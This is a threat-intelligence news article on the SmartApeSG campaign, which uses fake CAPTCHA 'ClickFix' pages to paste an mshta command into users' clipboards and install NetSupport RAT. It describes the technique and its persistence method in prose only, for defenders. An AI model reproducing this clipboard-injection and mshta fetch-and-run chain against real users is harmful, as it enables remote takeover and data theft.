The evolving SmartApeSG campaign, also known as ZPHP or HANEY MANEY, is employing a sophisticated ClickFix technique to deploy the NetSupport Remote Access Trojan (RAT) on Windows systems. This shift in tactics moves away from previous methods involving fake browser updates, instead tricking users into verifying their humanity through deceptive CAPTCHA pages to initiate malware infections.
First observed in June 2024, the SmartApeSG campaign’s primary vector involves compromised websites that host hidden malicious scripts. When specific conditions are met by a visiting user, these scripts activate, presenting a fake “verify you are human” prompt. This social engineering approach aims to bypass user vigilance and prompt actions that lead to the installation of malware.
SmartApeSG Leverages ClickFix Technique for NetSupport RAT Deployment
Security researchers have detailed how the SmartApeSG campaign uses a ClickFix-style technique, effectively exploiting user trust by masquerading as a necessary verification step. This method is particularly concerning as it relies on user interaction rather than exploiting software vulnerabilities, making it harder for traditional security solutions to block.
According to Internet Storm Center analysts, the attack chain begins when a user clicks the fake CAPTCHA box. This action triggers the injection of a malicious command string directly into the user’s clipboard. The command then utilizes the `mshta` utility to retrieve and execute malicious code hosted on attacker-controlled servers, a stealthy way to initiate the infection process.
The ultimate goal of this elaborate scheme is the installation of NetSupport RAT. This powerful remote access tool grants attackers extensive control over infected computers. With NetSupport RAT, threat actors can gain unauthorized access to sensitive data, monitor user activities in real-time, and further propagate other forms of malware onto the compromised system.
Multi-stage Approach for Enhanced Evasion
The SmartApeSG campaign’s multi-stage approach is crucial to its effectiveness. The initial infection phase, triggered by the fake CAPTCHA, lays the groundwork for the persistent presence of the NetSupport RAT on the victim’s machine. This persistence is maintained through a clever Windows mechanism.
Specifically, the campaign creates a Start Menu shortcut that points to a JavaScript file. This file is typically stored in the `AppDataLocalTemp` directory. Upon execution, the JavaScript file then triggers the actual NetSupport RAT executable, which is strategically placed in the `C:ProgramData` directory. This layered deployment makes the malware more challenging to detect and remove for the average user.
A significant factor contributing to the danger of SmartApeSG is the constant evolution of its operational infrastructure. The threat actors behind this campaign demonstrate a high degree of agility, frequently changing their command and control (C2) domains, server infrastructure, and the malware packages themselves. This rapid rotation necessitates continuous updates to threat intelligence feeds to effectively track and defend against ongoing attacks.
Organizations and individuals alike should prioritize educating themselves and their users about the risks associated with clicking verification boxes or other interactive elements on unfamiliar or compromised websites. Implementing network-level security measures to block connections to known malicious domains associated with the SmartApeSG campaign is also a critical defensive step. The ongoing evolution of this threat suggests that continuous adaptation of security strategies will be necessary to mitigate future risks.